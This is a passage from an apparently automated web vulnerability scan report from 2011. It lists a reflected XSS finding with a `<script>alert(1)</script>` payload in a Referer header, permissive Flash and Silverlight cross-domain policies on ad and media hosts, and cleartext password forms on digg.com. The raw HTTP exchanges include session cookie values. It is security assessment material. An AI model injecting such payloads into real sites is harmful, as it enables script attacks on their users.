Because the user data that is copied into the response is submitted within a request header, the application's behaviour is not trivial to exploit in an attack against another user. In the past, client-side technologies such as Flash have offered ways of causing another user's browser to make a request containing an arbitrary HTTP header. If you can use such a technique, you can probably leverage it to exploit the XSS flaw. This limitation partially mitigates the impact of the vulnerability.

Request

GET /lab/innerfade/ HTTP/1.1
Host: medienfreunde.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Referer: dc0bc"><script>alert(1)</script>80bc0e527c9

Response

HTTP/1.1 200 OK
Date: Wed, 06 Jul 2011 11:21:06 GMT
Server: Apache
X-Powered-By: PHP/5.2.12-nmm2
Vary: Accept-Encoding
Connection: close
Content-Type: text/html
Content-Length: 14719

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="de" lang="de">
<!-- saved from url=(0013)about:internet -->
   <hea
...[SNIP]...
<iframe src="http://pingomatic.com/ping/?title=Leipzig&blogurl=dc0bc"><script>alert(1)</script>80bc0e527c9&rssurl=&chk_weblogscom=on&chk_blogs=on&chk_technorati=on&chk_feedburner=on&chk_syndic8=on&chk_newsgator=on&chk_feedster=on&chk_myyahoo=on&chk_pubsubcom=on&chk_blogdigger=on&chk_blogstreet=on&chk_moreo
...[SNIP]...

3. Flash cross-domain policy
There are 13 instances of this issue:

Issue background

The Flash cross-domain policy controls whether Flash client components running on other domains can perform two-way interaction with the domain which publishes the policy. If another domain is allowed by the policy, then that domain can potentially attack users of the application. If a user is logged in to the application, and visits a domain allowed by the policy, then any malicious content running on that domain can potentially gain full access to the application within the security context of the logged-in user.

Even if an allowed domain is not overtly malicious in itself, security vulnerabilities within that domain could potentially be leveraged by a third-party attacker to exploit the trust relationship and attack the application which allows access.

Issue remediation

You should review the domains which are allowed by the Flash cross-domain policy and determine whether it is appropriate for the application to fully trust both the intentions and security posture of those domains.


3.1. http://ad.doubleclick.net/crossdomain.xml

Summary

Severity:   High
Confidence:   Certain
Host:   http://ad.doubleclick.net
Path:   /crossdomain.xml

Issue detail

The application publishes a Flash cross-domain policy which allows access from any domain.

Allowing access from all domains means that any domain can perform two-way interaction with this application. Unless the application consists entirely of unprotected public content, this policy is likely to present a significant security risk.

Request

GET /crossdomain.xml HTTP/1.0
Host: ad.doubleclick.net

Response

HTTP/1.0 200 OK
Server: DCLK-HttpSvr
Content-Type: text/xml
Content-Length: 258
Last-Modified: Thu, 18 Sep 2003 21:42:14 GMT
Date: Wed, 06 Jul 2011 11:55:06 GMT

<?xml version="1.0"?>
<!DOCTYPE cross-domain-policy SYSTEM "http://www.macromedia.com/xml/dtds/cross-domain-policy.dtd">
<!-- Policy file for http://www.doubleclick.net -->
<cross-domain-policy>

...[SNIP]...
<allow-access-from domain="*" />
...[SNIP]...

3.2. http://adx.adnxs.com/crossdomain.xml

Summary

Severity:   High
Confidence:   Certain
Host:   http://adx.adnxs.com
Path:   /crossdomain.xml

Issue detail

The application publishes a Flash cross-domain policy which allows access from any domain.

Allowing access from all domains means that any domain can perform two-way interaction with this application. Unless the application consists entirely of unprotected public content, this policy is likely to present a significant security risk.

Request

GET /crossdomain.xml HTTP/1.0
Host: adx.adnxs.com

Response

HTTP/1.0 200 OK
Cache-Control: no-store, no-cache, private
Pragma: no-cache
Expires: Sat, 15 Nov 2008 16:00:00 GMT
P3P: CP="OTI DSP COR ADMo TAIo PSAo PSDo CONo OUR SAMo OTRo STP UNI PUR COM NAV INT DEM STA PRE LOC"
Set-Cookie: sess=1; path=/; expires=Thu, 07-Jul-2011 15:39:09 GMT; domain=.adnxs.com; HttpOnly
Set-Cookie: uuid2=3420415245200633085; path=/; expires=Tue, 04-Oct-2011 15:39:09 GMT; domain=.adnxs.com; HttpOnly
Content-Type: text/xml

<?xml version="1.0"?><!DOCTYPE cross-domain-policy SYSTEM "http://www.macromedia.com/xml/dtds/cross-domain-policy.dtd"><cross-domain-policy><site-control permitted-cross-domain-policies="master-only"
...[SNIP]...
<allow-access-from domain="*"/>
...[SNIP]...

3.3. http://bp.specificclick.net/crossdomain.xml

Summary

Severity:   High
Confidence:   Certain
Host:   http://bp.specificclick.net
Path:   /crossdomain.xml

Issue detail

The application publishes a Flash cross-domain policy which allows access from any domain.

Allowing access from all domains means that any domain can perform two-way interaction with this application. Unless the application consists entirely of unprotected public content, this policy is likely to present a significant security risk.

Request

GET /crossdomain.xml HTTP/1.0
Host: bp.specificclick.net

Response

HTTP/1.1 200 OK
Server: WebStar 1.0
Content-Type: text/xml
Content-Length: 194
Date: Wed, 06 Jul 2011 15:39:03 GMT
Connection: close

<?xml version="1.0"?><!DOCTYPE cross-domain-policy SYSTEM "http://www.macromedia.com/xml/dtds/cross-domain-policy.dtd"><cross-domain-policy><allow-access-from domain="*" /></cross-domain-policy>

3.4. http://core.insightexpressai.com/crossdomain.xml

Summary

Severity:   High
Confidence:   Certain
Host:   http://core.insightexpressai.com
Path:   /crossdomain.xml

Issue detail

The application publishes a Flash cross-domain policy which allows access from any domain.

Allowing access from all domains means that any domain can perform two-way interaction with this application. Unless the application consists entirely of unprotected public content, this policy is likely to present a significant security risk.

Request

GET /crossdomain.xml HTTP/1.0
Host: core.insightexpressai.com

Response

HTTP/1.0 200 OK
Content-Type: text/xml
Last-Modified: Tue, 02 Feb 2010 21:21:42 GMT
ETag: "0f7cfb64da4ca1:0"
Server: Microsoft-IIS/7.0
P3P: CP="OTI DSP COR CUR ADMi DEVi TAI PSA PSD IVD CONi TELi OUR BUS STA"
Date: Wed, 06 Jul 2011 15:38:53 GMT
Content-Length: 139
Connection: close
Cache-Control: no-store

<cross-domain-policy>
<allow-access-from domain="*" />
<site-control permitted-cross-domain-policies="all"/>
</cross-domain-policy>

3.5. http://ecn.dev.virtualearth.net/crossdomain.xml

Summary

Severity:   High
Confidence:   Certain
Host:   http://ecn.dev.virtualearth.net
Path:   /crossdomain.xml

Issue detail

The application publishes a Flash cross-domain policy which allows access from any domain.

Allowing access from all domains means that any domain can perform two-way interaction with this application. Unless the application consists entirely of unprotected public content, this policy is likely to present a significant security risk.

Request

GET /crossdomain.xml HTTP/1.0
Host: ecn.dev.virtualearth.net

Response

HTTP/1.0 200 OK
Cache-Control: max-age=5443200
Content-Type: text/xml
Last-Modified: Thu, 16 Jun 2011 00:30:01 GMT
Accept-Ranges: bytes
ETag: "57c5b87bc2bcc1:0"
Server: Microsoft-IIS/7.5
X-Powered-By: ASP.NET
Date: Wed, 06 Jul 2011 15:38:54 GMT
Content-Length: 277
Connection: close

<?xml version="1.0"?>
<!DOCTYPE cross-domain-policy SYSTEM "http://www.macromedia.com/xml/dtds/cross-domain-policy.dtd">
<cross-domain-policy>
<allow-access-from domain="*" />
<allow-http-r
...[SNIP]...

3.6. http://idcs.interclick.com/crossdomain.xml

Summary

Severity:   High
Confidence:   Certain
Host:   http://idcs.interclick.com
Path:   /crossdomain.xml

Issue detail

The application publishes a Flash cross-domain policy which allows access from any domain.

Allowing access from all domains means that any domain can perform two-way interaction with this application. Unless the application consists entirely of unprotected public content, this policy is likely to present a significant security risk.

Request

GET /crossdomain.xml HTTP/1.0
Host: idcs.interclick.com

Response

HTTP/1.1 200 OK
Content-Type: text/xml
Last-Modified: Thu, 23 Jun 2011 03:34:28 GMT
Accept-Ranges: bytes
ETag: "f5f224755631cc1:0"
Server: Microsoft-IIS/7.0
X-Powered-By: ASP.NET
P3P: policyref="http://www.interclick.com/w3c/p3p.xml",CP="NON DSP ADM DEV PSD OUR IND PRE NAV UNI"
Date: Wed, 06 Jul 2011 15:39:03 GMT
Connection: close
Content-Length: 225

<?xml version="1.0" encoding="utf-8" ?>
<!DOCTYPE cross-domain-policy SYSTEM "http://www.macromedia.com/xml/dtds/cross-domain-policy.dtd">
<cross-domain-policy>
<allow-access-from domain="*" />
...[SNIP]...

3.7. http://rs.gwallet.com/crossdomain.xml

Summary

Severity:   High
Confidence:   Certain
Host:   http://rs.gwallet.com
Path:   /crossdomain.xml

Issue detail

The application publishes a Flash cross-domain policy which allows access from any domain.

Allowing access from all domains means that any domain can perform two-way interaction with this application. Unless the application consists entirely of unprotected public content, this policy is likely to present a significant security risk.

Request

GET /crossdomain.xml HTTP/1.0
Host: rs.gwallet.com

Response

HTTP/1.1 200 OK
Content-Length: 207
Server: radiumone/1.2
Content-type: text/xml; charset=UTF-8
P3p: CP="IDC DSP COR ADM DEVi TAIi PSA PSD IVAi IVDi CONi HIS OUR IND CNT"
Connection: close

<?xml version="1.0"?>
<!DOCTYPE cross-domain-policy SYSTEM "http://www.adobe.com/xml/dtds/cross-domain-policy.dtd">
<cross-domain-policy>
<allow-access-from domain="*" secure="false"/>
</cross-domain-
...[SNIP]...

3.8. http://bstats.adbrite.com/crossdomain.xml

Summary

Severity:   Low
Confidence:   Certain
Host:   http://bstats.adbrite.com
Path:   /crossdomain.xml

Issue detail

The application publishes a Flash cross-domain policy which uses a wildcard to specify allowed domains, allows access from specific other domains, and allows access from specific subdomains.

Using a wildcard to specify allowed domains means that any domain matching the wildcard expression can perform two-way interaction with this application. You should only use this policy if you fully trust every possible web site that may reside on a domain which matches the wildcard expression.

Allowing access from specific domains means that web sites on those domains can perform two-way interaction with this application. You should only use this policy if you fully trust the specific domains allowed by the policy.

Request

GET /crossdomain.xml HTTP/1.0
Host: bstats.adbrite.com

Response

HTTP/1.1 200 OK
Content-Type: text/x-cross-domain-policy
Content-Length: 398
Connection: close
Server: XPEHb/1.0
Accept-Ranges: none
Date: Wed, 06 Jul 2011 15:39:06 GMT

<?xml version="1.0" encoding="UTF-8"?>
<!-- AdBrite crossdomain.xml for BritePic and BriteFlic -->
<cross-domain-policy>
<allow-access-from domain="*.adbrite.com" secure="true" />
<allow-access-from domain="www.adbrite.com" secure="true" />
...[SNIP]...
<allow-access-from domain="*.britepic.com" secure="true" />
...[SNIP]...
<allow-access-from domain="www.britepic.com" secure="true" />
...[SNIP]...

3.9. http://cdn.stumble-upon.com/crossdomain.xml

Summary

Severity:   Low
Confidence:   Certain
Host:   http://cdn.stumble-upon.com
Path:   /crossdomain.xml

Issue detail

The application publishes a Flash cross-domain policy which uses a wildcard to specify allowed domains, and allows access from specific other domains.

Using a wildcard to specify allowed domains means that any domain matching the wildcard expression can perform two-way interaction with this application. You should only use this policy if you fully trust every possible web site that may reside on a domain which matches the wildcard expression.

Allowing access from specific domains means that web sites on those domains can perform two-way interaction with this application. You should only use this policy if you fully trust the specific domains allowed by the policy.

Request

GET /crossdomain.xml HTTP/1.0
Host: cdn.stumble-upon.com

Response

HTTP/1.0 200 OK
Server: Apache
Last-Modified: Tue, 31 May 2011 21:14:03 GMT
Content-Type: application/xml
Content-Length: 460
Date: Wed, 06 Jul 2011 11:15:25 GMT
Connection: close

<?xml version="1.0"?>
<!DOCTYPE cross-domain-policy SYSTEM "http://www.macromedia.com/xml/dtds/cross-domain-policy.dtd">

<cross-domain-policy>
   <allow-access-from domain="www.stumbleupon.com" />
   <allow-access-from domain="*.stumble.net" />
   <allow-access-from domain="stumble.net" />
   <allow-access-from domain="*.stumbleupon.com" />
   <allow-access-from domain="stumbleupon.com" />
...[SNIP]...

3.10. http://feeds.bbci.co.uk/crossdomain.xml

Summary

Severity:   Low
Confidence:   Certain
Host:   http://feeds.bbci.co.uk
Path:   /crossdomain.xml

Issue detail

The application publishes a Flash cross-domain policy which uses a wildcard to specify allowed domains, and allows access from specific other domains.

Using a wildcard to specify allowed domains means that any domain matching the wildcard expression can perform two-way interaction with this application. You should only use this policy if you fully trust every possible web site that may reside on a domain which matches the wildcard expression.

Allowing access from specific domains means that web sites on those domains can perform two-way interaction with this application. You should only use this policy if you fully trust the specific domains allowed by the policy.

Request

GET /crossdomain.xml HTTP/1.0
Host: feeds.bbci.co.uk

Response

HTTP/1.0 200 OK
Server: Apache
Last-Modified: Wed, 20 Apr 2011 09:07:59 GMT
Content-Type: text/xml
Cache-Control: max-age=120
Expires: Wed, 06 Jul 2011 11:56:38 GMT
Date: Wed, 06 Jul 2011 11:54:38 GMT
Content-Length: 1081
Connection: close

<?xml version="1.0"?>
<!DOCTYPE cross-domain-policy SYSTEM "http://www.adobe.com/xml/dtds/cross-domain-policy.dtd">
<cross-domain-policy>
   <site-control permitted-cross-domain-policies="master-o
...[SNIP]...
<allow-access-from domain="downloads.bbc.co.uk" />
   <allow-access-from domain="www.bbcamerica.com" />
   <allow-access-from domain="*.bbcamerica.com" />
   <allow-access-from domain="www.bbc.co.uk" />
   <allow-access-from domain="news.bbc.co.uk" />
   <allow-access-from domain="newsimg.bbc.co.uk"/>
   <allow-access-from domain="nolpreview11.newsonline.tc.nca.bbc.co.uk" />
   <allow-access-from domain="newsrss.bbc.co.uk" />
   <allow-access-from domain="newsapi.bbc.co.uk" />
   <allow-access-from domain="extdev.bbc.co.uk" />
   <allow-access-from domain="stats.bbc.co.uk" />
   <allow-access-from domain="*.bbc.co.uk"/>
   <allow-access-from domain="*.bbci.co.uk"/>
   <allow-access-from domain="*.bbc.com"/>
...[SNIP]...
<allow-access-from domain="jam.bbc.co.uk" />
   <allow-access-from domain="dc01.dc.bbc.co.uk" />
...[SNIP]...

3.11. http://googleads.g.doubleclick.net/crossdomain.xml

Summary

Severity:   Low
Confidence:   Certain
Host:   http://googleads.g.doubleclick.net
Path:   /crossdomain.xml

Issue detail

The application publishes a Flash cross-domain policy which uses a wildcard to specify allowed domains, and allows access from specific other domains.

Using a wildcard to specify allowed domains means that any domain matching the wildcard expression can perform two-way interaction with this application. You should only use this policy if you fully trust every possible web site that may reside on a domain which matches the wildcard expression.

Allowing access from specific domains means that web sites on those domains can perform two-way interaction with this application. You should only use this policy if you fully trust the specific domains allowed by the policy.

Request

GET /crossdomain.xml HTTP/1.0
Host: googleads.g.doubleclick.net

Response

HTTP/1.0 200 OK
P3P: policyref="http://googleads.g.doubleclick.net/pagead/gcn_p3p_.xml", CP="CURa ADMa DEVa TAIo PSAo PSDo OUR IND UNI PUR INT DEM STA PRE COM NAV OTC NOI DSP COR"
Content-Type: text/x-cross-domain-policy; charset=UTF-8
Last-Modified: Fri, 27 May 2011 17:28:41 GMT
Date: Wed, 06 Jul 2011 01:47:26 GMT
Expires: Thu, 07 Jul 2011 01:47:26 GMT
X-Content-Type-Options: nosniff
Server: cafe
X-XSS-Protection: 1; mode=block
Age: 36459
Cache-Control: public, max-age=86400

<?xml version="1.0"?>

<!DOCTYPE cross-domain-policy SYSTEM "http://www.macromedia.com/xml/dtds/cross-domain-policy.dtd">
<cross-domain-policy>
<allow-access-from domain="maps.gstatic.com" />
<allow-access-from domain="maps.gstatic.cn" />
<allow-access-from domain="*.googlesyndication.com" />
<allow-access-from domain="*.google.com" />
<allow-access-from domain="*.google.ae" />
<allow-access-from domain="*.google.at" />
<allow-access-from domain="*.google.be" />
<allow-access-from domain="*.google.ca" />
<allow-access-from domain="*.google.ch" />
<allow-access-from domain="*.google.cn" />
<allow-access-from domain="*.google.co.il" />
<allow-access-from domain="*.google.co.in" />
<allow-access-from domain="*.google.co.jp" />
<allow-access-from domain="*.google.co.kr" />
<allow-access-from domain="*.google.co.nz" />
<allow-access-from domain="*.google.co.uk" />
<allow-access-from domain="*.google.co.ve" />
<allow-access-from domain="*.google.co.za" />
<allow-access-from domain="*.google.com.ar" />
<allow-access-from domain="*.google.com.au" />
<allow-access-from domain="*.google.com.br" />
<allow-access-from domain="*.google.com.gr" />
<allow-access-from domain="*.google.com.hk" />
<allow-access-from domain="*.google.com.ly" />
<allow-access-from domain="*.google.com.mx" />
<allow-access-from domain="*.google.com.my" />
<allow-access-from domain="*.google.com.pe" />
<allow-access-from domain="*.google.com.ph" />
<allow-access-from domain="*.google.com.pk" />
<allow-access-from domain="*.google.com.ru" />
<allow-access-from domain="*.google.com.sg" />
<allow-access-from domain="*.google.com.tr" />
<allow-access-from domain="*.google.com.tw" />
<allow-access-from domain="*.google.com.ua" />
<allow-access-from domain="*.google.com.vn" />
<allow-access-from domain="*.google.de" />
<allow-access-from domain="*.google.dk" />
<allow-access-from domain="*.google.es" />
<allow-access-from domain="*.google.fi" />
<allow-access-from domain="*.google.fr" />
<allow-access-from domain="*.google.it" />
<allow-access-from domain="*.google.lt" />
<allow-access-from domain="*.google.lv" />
<allow-access-from domain="*.google.nl" />
<allow-access-from domain="*.google.no" />
<allow-access-from domain="*.google.pl" />
<allow-access-from domain="*.google.pt" />
<allow-access-from domain="*.google.ro" />
<allow-access-from domain="*.google.se" />
<allow-access-from domain="*.google.sk" />
<allow-access-from domain="*.youtube.com" />
<allow-access-from domain="*.ytimg.com" />
<allow-access-from domain="*.2mdn.net" />
<allow-access-from domain="*.doubleclick.net" />
<allow-access-from domain="*.doubleclick.com" />
...[SNIP]...

3.12. http://newsrss.bbc.co.uk/crossdomain.xml

Summary

Severity:   Low
Confidence:   Certain
Host:   http://newsrss.bbc.co.uk
Path:   /crossdomain.xml

Issue detail

The application publishes a Flash cross-domain policy which uses a wildcard to specify allowed domains, allows access from specific other domains, and allows access from specific subdomains.

Using a wildcard to specify allowed domains means that any domain matching the wildcard expression can perform two-way interaction with this application. You should only use this policy if you fully trust every possible web site that may reside on a domain which matches the wildcard expression.

Allowing access from specific domains means that web sites on those domains can perform two-way interaction with this application. You should only use this policy if you fully trust the specific domains allowed by the policy.

Request

GET /crossdomain.xml HTTP/1.0
Host: newsrss.bbc.co.uk

Response

HTTP/1.0 200 OK
Server: Apache
Last-Modified: Wed, 20 Apr 2011 09:07:59 GMT
Content-Type: text/xml
Cache-Control: max-age=120
Expires: Wed, 06 Jul 2011 11:56:37 GMT
Date: Wed, 06 Jul 2011 11:54:37 GMT
Content-Length: 1081
Connection: close

<?xml version="1.0"?>
<!DOCTYPE cross-domain-policy SYSTEM "http://www.adobe.com/xml/dtds/cross-domain-policy.dtd">
<cross-domain-policy>
   <site-control permitted-cross-domain-policies="master-o
...[SNIP]...
<allow-access-from domain="downloads.bbc.co.uk" />
   <allow-access-from domain="www.bbcamerica.com" />
   <allow-access-from domain="*.bbcamerica.com" />
   <allow-access-from domain="www.bbc.co.uk" />
   <allow-access-from domain="news.bbc.co.uk" />
   <allow-access-from domain="newsimg.bbc.co.uk"/>
   <allow-access-from domain="nolpreview11.newsonline.tc.nca.bbc.co.uk" />
...[SNIP]...
<allow-access-from domain="newsapi.bbc.co.uk" />
   <allow-access-from domain="extdev.bbc.co.uk" />
   <allow-access-from domain="stats.bbc.co.uk" />
   <allow-access-from domain="*.bbc.co.uk"/>
   <allow-access-from domain="*.bbci.co.uk"/>
   <allow-access-from domain="*.bbc.com"/>
...[SNIP]...
<allow-access-from domain="jam.bbc.co.uk" />
   <allow-access-from domain="dc01.dc.bbc.co.uk" />
...[SNIP]...

3.13. http://api.twitter.com/crossdomain.xml

Summary

Severity:   Information
Confidence:   Certain
Host:   http://api.twitter.com
Path:   /crossdomain.xml

Issue detail

The application publishes a Flash cross-domain policy which allows access from specific subdomains.

Allowing access from specific domains means that web sites on those domains can perform two-way interaction with this application. You should only use this policy if you fully trust the specific domains allowed by the policy.

Request

GET /crossdomain.xml HTTP/1.0
Host: api.twitter.com

Response

HTTP/1.1 200 OK
Date: Wed, 06 Jul 2011 14:02:30 GMT
Server: hi
Status: 200 OK
Last-Modified: Tue, 05 Jul 2011 19:19:41 GMT
Content-Type: application/xml
Content-Length: 561
Cache-Control: max-age=1800
Expires: Wed, 06 Jul 2011 14:32:30 GMT
Vary: Accept-Encoding
Connection: close

<?xml version="1.0" encoding="UTF-8"?>
<cross-domain-policy xmlns:xsi="http://www.w3.org/2001/XMLSchema-instance" xsi:noNamespaceSchemaLocation="http://www.adobe.com/xml/schemas/PolicyFile.xsd">
<allow-access-from domain="twitter.com" />
...[SNIP]...
<allow-access-from domain="search.twitter.com" />
   <allow-access-from domain="static.twitter.com" />
...[SNIP]...

4. Silverlight cross-domain policy
There are 3 instances of this issue:

Issue background

The Silverlight cross-domain policy controls whether Silverlight client components running on other domains can perform two-way interaction with the domain which publishes the policy. If another domain is allowed by the policy, then that domain can potentially attack users of the application. If a user is logged in to the application, and visits a domain allowed by the policy, then any malicious content running on that domain can potentially gain full access to the application within the security context of the logged in user.

Even if an allowed domain is not overtly malicious in itself, security vulnerabilities within that domain could potentially be leveraged by a third-party attacker to exploit the trust relationship and attack the application which allows access.

Issue remediation

You should review the domains which are allowed by the Silverlight cross-domain policy and determine whether it is appropriate for the application to fully trust both the intentions and security posture of those domains.


4.1. http://ad.doubleclick.net/clientaccesspolicy.xml

Summary

Severity:   High
Confidence:   Certain
Host:   http://ad.doubleclick.net
Path:   /clientaccesspolicy.xml

Issue detail

The application publishes a Silverlight cross-domain policy which allows access from any domain.

Allowing access from all domains means that any domain can perform two-way interaction with this application. Unless the application consists entirely of unprotected public content, this policy is likely to present a significant security risk.

Request

GET /clientaccesspolicy.xml HTTP/1.0
Host: ad.doubleclick.net

Response

HTTP/1.0 200 OK
Server: DCLK-HttpSvr
Content-Type: text/xml
Content-Length: 314
Last-Modified: Tue, 20 May 2008 22:28:37 GMT
Date: Wed, 06 Jul 2011 11:55:06 GMT

<?xml version="1.0" encoding="utf-8"?>
<access-policy>
<cross-domain-access>
<policy>
<allow-from>
<domain uri="*"/>
</allow-from>
<grant-to>
<resource
...[SNIP]...

4.2. http://ecn.dev.virtualearth.net/clientaccesspolicy.xml

Summary

Severity:   High
Confidence:   Certain
Host:   http://ecn.dev.virtualearth.net
Path:   /clientaccesspolicy.xml

Issue detail

The application publishes a Silverlight cross-domain policy which allows access from any domain.

Allowing access from all domains means that any domain can perform two-way interaction with this application. Unless the application consists entirely of unprotected public content, this policy is likely to present a significant security risk.

Request

GET /clientaccesspolicy.xml HTTP/1.0
Host: ecn.dev.virtualearth.net

Response

HTTP/1.0 200 OK
Cache-Control: max-age=5443200
Content-Type: text/xml
Last-Modified: Thu, 16 Jun 2011 00:30:01 GMT
Accept-Ranges: bytes
ETag: "57c5b87bc2bcc1:0"
Server: Microsoft-IIS/7.5
X-Powered-By: ASP.NET
Date: Wed, 06 Jul 2011 15:38:55 GMT
Content-Length: 374
Connection: close

<?xml version="1.0" encoding="utf-8"?>
<access-policy>
<cross-domain-access>
<policy>
<allow-from http-request-headers="*">
<domain uri="*"/>
<domain uri="http://*"/>
...[SNIP]...

4.3. http://profile.live.com/clientaccesspolicy.xml

Summary

Severity:   Information
Confidence:   Certain
Host:   http://profile.live.com
Path:   /clientaccesspolicy.xml

Issue detail

The application publishes a Silverlight cross-domain policy which allows access from specific other domains.

Allowing access from specific domains means that web sites on those domains can perform two-way interaction with this application. You should only use this policy if you fully trust the specific domains allowed by the policy.

Request

GET /clientaccesspolicy.xml HTTP/1.0
Host: profile.live.com

Response

HTTP/1.1 200 OK
Cache-Control: no-cache, no-store
Pragma: no-cache
Content-Type: text/xml; charset=utf-8
Expires: -1
Server: Microsoft-IIS/7.5
X-Imf: 197a8481-8887-45ea-8ece-afbd16506d13
Set-Cookie: E=P:umIuReUJzog=:GJEjRxGdddMqyUcXEbDkHPosnhQDlAGYffAsX7wlFVE=:F; domain=.live.com; path=/
X-AspNet-Version: 4.0.30319
Set-Cookie: E=P:umIuReUJzog=:GJEjRxGdddMqyUcXEbDkHPosnhQDlAGYffAsX7wlFVE=:F; domain=.live.com; path=/
Set-Cookie: xidseq=2; domain=.live.com; path=/
Set-Cookie: LD=; domain=.live.com; expires=Wed, 06-Jul-2011 09:36:21 GMT; path=/
Set-Cookie: wla42=; domain=live.com; expires=Wed, 13-Jul-2011 11:16:21 GMT; path=/
Set-Cookie: sc_clustbl_142=b74b373a208052d8; domain=profile.live.com; expires=Fri, 05-Aug-2011 11:16:21 GMT; path=/
X-Powered-By: ASP.NET
X-Content-Type-Options: nosniff
X-MSNSERVER: H: BL2XXXXXC626 V: 1 D: 6/27/2011
Date: Wed, 06 Jul 2011 11:16:21 GMT
Connection: close
Content-Length: 400

<?xml version="1.0" encoding="utf-8"?>
<access-policy>
<cross-domain-access>
<policy>
<allow-from http-request-headers="*">
<domain uri="http://msc.wlxrs.com"/>

...[SNIP]...

5. Cleartext submission of password
There are 10 instances of this issue:

Issue background

Passwords submitted over an unencrypted connection are vulnerable to capture by an attacker who is suitably positioned on the network. This includes any malicious party located on the user's own network, within their ISP, within the ISP used by the application, and within the application's hosting infrastructure. Even if switched networks are employed at some of these locations, techniques exist to circumvent this defence and monitor the traffic passing through switches.

Issue remediation

The application should use transport-level encryption (SSL or TLS) to protect all sensitive communications passing between the client and the server. Communications that should be protected include the login mechanism and related functionality, and any functions where sensitive data can be accessed or privileged actions can be performed. These areas of the application should employ their own session handling mechanism, and the session tokens used should never be transmitted over unencrypted communications. If HTTP cookies are used for transmitting session tokens, then the secure flag should be set to prevent transmission over clear-text HTTP.


5.1. http://digg.com/

Summary

Severity:   High
Confidence:   Certain
Host:   http://digg.com
Path:   /

Issue detail

The page contains a form with the following action URL, which is submitted over clear-text HTTP:

The form contains the following password field:

Request

GET / HTTP/1.1
Host: digg.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Date: Wed, 06 Jul 2011 11:37:06 GMT
Server: Apache
X-Powered-By: PHP/5.2.9-digg8
Cache-Control: no-cache,no-store,must-revalidate
Pragma: no-cache
Set-Cookie: imp_id=be4697b47d58b1200ef3f6956c8cc49e2813419339d6fd7bb526092b66b1dc13; expires=Thu, 07-Jul-2011 11:37:07 GMT; path=/; domain=digg.com
X-Digg-Time: D=237528 10.2.129.225
Vary: Accept-Encoding
Connection: close
Content-Type: text/html;charset=UTF-8
Content-Length: 101255

<!DOCTYPE html>
<html>
<head>
<meta charset="utf-8">
<title>Digg
- All Topics
- The Latest News Headlines, Videos and Images
</title>

<met
...[SNIP]...
</script><form class="hidden">
<input type="text" name="ident" value="" id="ident-saved">
<input type="password" name="password" value="" id="password-saved">
</form>
...[SNIP]...

5.2. http://digg.com/login

Summary

Severity:   High
Confidence:   Certain
Host:   http://digg.com
Path:   /login

Issue detail

The page contains a form with the following action URL, which is submitted over clear-text HTTP:

The form contains the following password field:

Request

GET /login HTTP/1.1
Host: digg.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Date: Wed, 06 Jul 2011 11:37:08 GMT
Server: Apache
X-Powered-By: PHP/5.2.9-digg8
X-Digg-Time: D=24276 10.2.129.225
Cache-Control: no-cache,no-store,must-revalidate
Pragma: no-cache
Vary: Accept-Encoding
Connection: close
Content-Type: text/html;charset=UTF-8
Content-Length: 8609

<!DOCTYPE html>
<html>
<head>
<meta charset="utf-8">
<title>Digg</title>

<meta name="keywords" content="Digg, pictures, breaking news, entertainment, politics, technology, headlin
...[SNIP]...
</ul>
<form id="login" method="post" action="/ajax/auth/prepare/digg" class="digg-form group invite-form">
<input type="hidden" name="sn" value="">
...[SNIP]...
</label>
<input type="password" name="password" class="text-input placeholder-input" tabindex="2" id="password">
</span>
...[SNIP]...

5.3. http://digg.com/login

Summary

Severity:   High
Confidence:   Certain
Host:   http://digg.com
Path:   /login

Issue detail

The page contains a form with the following action URL, which is submitted over clear-text HTTP:

The form contains the following password field:

Request

GET /login HTTP/1.1
Host: digg.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Date: Wed, 06 Jul 2011 11:37:08 GMT
Server: Apache
X-Powered-By: PHP/5.2.9-digg8
X-Digg-Time: D=24276 10.2.129.225
Cache-Control: no-cache,no-store,must-revalidate
Pragma: no-cache
Vary: Accept-Encoding
Connection: close
Content-Type: text/html;charset=UTF-8
Content-Length: 8609

<!DOCTYPE html>
<html>
<head>
<meta charset="utf-8">
<title>Digg</title>

<meta name="keywords" content="Digg, pictures, breaking news, entertainment, politics, technology, headlin
...[SNIP]...
</script><form class="hidden">
<input type="text" name="ident" value="" id="ident-saved">
<input type="password" name="password" value="" id="password-saved">
</form>
...[SNIP]...

5.4. http://digg.com/register

Summary

Severity:   High
Confidence:   Certain
Host:   http://digg.com
Path:   /register

Issue detail

The page contains a form with the following action URL, which is submitted over clear-text HTTP:

The form contains the following password field:

Request

GET /register HTTP/1.1
Host: digg.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Date: Wed, 06 Jul 2011 11:37:08 GMT
Server: Apache
X-Powered-By: PHP/5.2.9-digg8
X-Digg-Time: D=38879 10.2.129.225
Cache-Control: no-cache,no-store,must-revalidate
Pragma: no-cache
Vary: Accept-Encoding
Connection: close
Content-Type: text/html;charset=UTF-8
Content-Length: 10144

<!DOCTYPE html>
<html>
<head>
<meta charset="utf-8">
<title>Digg</title>

<meta name="keywords" content="Digg, pictures, breaking news, entertainment, politics, technology, headlin
...[SNIP]...
</ul>
<form id="register" method="post" action="/ajax/auth/register" class="digg-form group invite-form">
<input type="hidden" name="sn" value="">
...[SNIP]...
</label>
<input type="password" name="password-register" id="password-register" class="text-input placeholder-input" tabindex="3">
</span>
...[SNIP]...

5.5. http://digg.com/register

Summary

Severity:   High
Confidence:   Certain
Host:   http://digg.com
Path:   /register

Issue detail

The page contains a form with the following action URL, which is submitted over clear-text HTTP:

The form contains the following password field:

Request

GET /register HTTP/1.1
Host: digg.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
